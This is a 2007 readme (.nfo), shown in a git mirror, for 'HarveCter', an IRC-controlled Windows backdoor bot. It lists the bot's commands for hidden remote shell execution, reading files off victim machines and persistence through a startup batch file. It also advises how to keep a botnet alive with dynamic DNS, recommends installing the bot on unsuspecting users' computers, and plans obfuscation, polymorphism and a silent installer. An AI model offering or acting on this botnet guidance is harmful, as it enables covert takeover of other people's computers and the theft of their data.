Histogram improvements
[mirrors/Programs.git] / c / HarveCter / harvecter.nfo
1 <>=========================================================== 1001 1001 1011 1110 0000 01101 1110 ===<>\r
2 ___ ___ ___ ___ \r
3 /__/\ / /\ / /\ ___ ___ / /\ \r
4 \ \:\ / /::\ / /::\ /__/\ / /\ / /:/_ \r
5 \__\:\ / /:/\:\ / /:/\:\ \ \:\ / /:/ / /:/ /\ \r
6 ___ / /::\ / /:/~/::\ / /:/~/:/ \ \:\ /__/::\ / /:/ /:/_ \r
7 /__/\ /:/\:\/__/:/ /:/\:\/__/:/ /:/___ ___ \__\:\\__\/\:\__ /__/:/ /:/ /\\r
8 \ \:\/:/__\/\ \:\/:/__\/\ \:\/::::://__/\ | |:| \ \:\/\\ \:\/:/ /:/\r
9 \ \::/ \ \::/ \ \::/~~~~ \ \:\| |:| \__\::/ \ \::/ /:/ \r
10 \ \:\ \ \:\ \ \:\ \ \:\__|:| /__/:/ \ \:\/:/ \r
11 \ \:\ \ \:\ \ \:\ \__\::::/ \__\/ \ \::/ \r
12 \__\/ \__\/ \__\/ ~~~~ \__\/ \r
13 \r
14 <>===== IRC Bot ================================================================ <-- Harvie 2oo7 ====<>\r
15 <> <>\r
16 <> <>GENERAL <>\r
17 <> Name: HarveCter <>\r
18 <> Subject: IRC Bot <>\r
19 <> Description: Remote Control/Backdoor/Zombie/etc... Everything is controled by IRC <>\r
f9138ad7 20 <> Version: 1.0 <>\r
21 <> <>\r
22 <> <>DETAILS <>\r
23 <> Platform: Microsoft Windows (Tested on XP SP2) <>\r
24 <> Language: Ansi C + Few windows libs (windows.h & WinSock) <>\r
25 <> Author: <-- Harvie <>\r
26 <> Date: 2oo7 <>\r
27 <> Contact: Harvie@irc.2600.net <>\r
28 <> <>\r
29 <>=====0=======================================================================================1=====<>\r
30 <>======0=======================================================================================1====<>\r
31 <>====000=============================================================== <-- Harvie 2oo7 =====111====<>\r
33 <>===== INFO ================================================ 1001 1001 1011 1110 0000 01101 1110 ===<>\r
34 \r
35 <>Building info:\r
36Optimalized for Dev-Cpp.\r
37Compile as windows GUI app. to make a daemon.\r
39 <>Warnings:\r
40There is not so big security!!!\r
41If you want to keep your zombies,\r
42control them only by PM or at completely secure channel!!!\r
43All passwords, that are starting with your password will be accepted!!!\r
44If you want to keep your botnet use Dynamic IRC server maping (by Dynamic DNS),\r
45rather than sending bots directly to one server (as irc.2600.net:6667)!!!\r
47 <>Setting up:\r
48- You can do all settings in source.\r
49- for better security use a different password for channel and bots.\r
51 <>Commands:\r
52- Warning: all commands are case sensitive\r
54- !login [login] //Bad login=logout\r
55- !chanpass //Set mode +k (each bot sends this when connected)\r
57 <>Privileged commands (needs login)\r
58- !SAY [msg] //Say msg\r
59- !CMD [shell command] //Execute command @ bot (hidden console window)\r
60- !CMD start [shell command] //Execute command @ bot (show console window)\r
f9138ad7 61- !head [file to send] //Send few (maxlines_to_send) lines of file\r
62- !raw [line to send] //Sends raw line to server (you can OP yourself)\r
63- !info //Info about zombie\r
64- !time //Local time @ zombie\r
65- !show //Show console window\r
66- !hide //Hide console window\r
67- !restart //Restart connection to server\r
68- !respawn //Restart whole zombie\r
70 <>Startup commands:\r
71Each time when the bot starts, he executes the "hircb.rc.bat" file - hidden (UTFS).\r
73 <>More functions:\r
74If you want to add more functions to this bot, you can add them direct to the code,\r
75or you can simple add executable binaries to its directory (!CMD binary.exe).\r
76This binary must be fully controlled from CLI (command line).\r
78 <>Recommended binaries to add:\r
79- Wget (wget.exe) - Allows you to download files from http & ftp (add functions online...)\r
80- cURL (curl.exe) - Allows you to upload files to your server (needs some php scripts...)\r
82 <>Another usefull binaries:\r
83- NetCat (nc.exe) - Useful (Easy Networking, Firewall test, Backdoor, etc...) - you know...\r
84- Servers - FTP(SlimFTPd), HTTP(you can strip Apache), SMTP, SOCKS, Proxy\r
85- Runtimes - Unix(CygWin), Java(JArX) PHP, Perl, Python\r
86- NirCMD2 - (nircmdc.exe) Work with special windows features (mouse,gui,system functions,...)\r
87- CLAmp (clamp.exe) - Winamp Control (Yeah! What do you expected???)\r
f9138ad7 88- Anything else - DoS, mailing (Don't do any ilegal stuff with this - just testing!!!)\r
90 <>Recommendations:\r
91- Use some free DNS service to move zombies across servers.\r
92- Take very big care about channel security.\r
93- Install this bot only at n00bz' computers, because there is no encryption\r
94 (anybody else can sniff and get passwords, etc...)\r
96 <>Version history:\r
97- future - Maybe some bugfixes\r
98- 1.0 - Fixed for overflows, checked bounds, etc..., reformated/reidented source\r
99- 1.0bRC1 - Implemented Connection checker (new thread), Implemented "!line"\r
100- 1.0b - Bugfixes (cmdfile), Implemented "!respawn"\r
101- 0.9 - Executing hircb.rc.bat at startup, first use "In the Wild" -> found bugs, need "!respawn"\r
102- 0.8 - Hidden execution\r
103- 0.7 - Implemented "!info" & "!time"\r
104- 0.6 - Implemented "!login" function\r
105- 0.5 - Implemented "!CMD" function\r
106- other - I can't remember ;D\r
108 <>To Do:\r
109- Need SSL to Rock!\r
110- Binary obfuscation better than UPX\r
111- Polymorfism?\r
112- Test binary on "W0W MS OS Vista" (sorry, im running Linux ;)\r
113- Implement some minimalistic hack, which allows you to download wget\r
114- Utility for changing bot settings by direct binary patching without recompiling\r
115- Automatic silent installer\r
117 <>Terms of use:\r
118- Use it like you want [use, change, abuse]!\r
119- There is no warranty, because this is free of charge for you!\r
120- There is no responsibility from side of author, because this is tool only!\r
121- Only you are responsible for yours acts!\r
123 <>=====0=======================================================================================1=====<>\r
124 <>======0=======================================================================================1====<>\r
f9138ad7 125 <>====000============================================================= <-- Harvie 2oo7/8 =====111====<>\r
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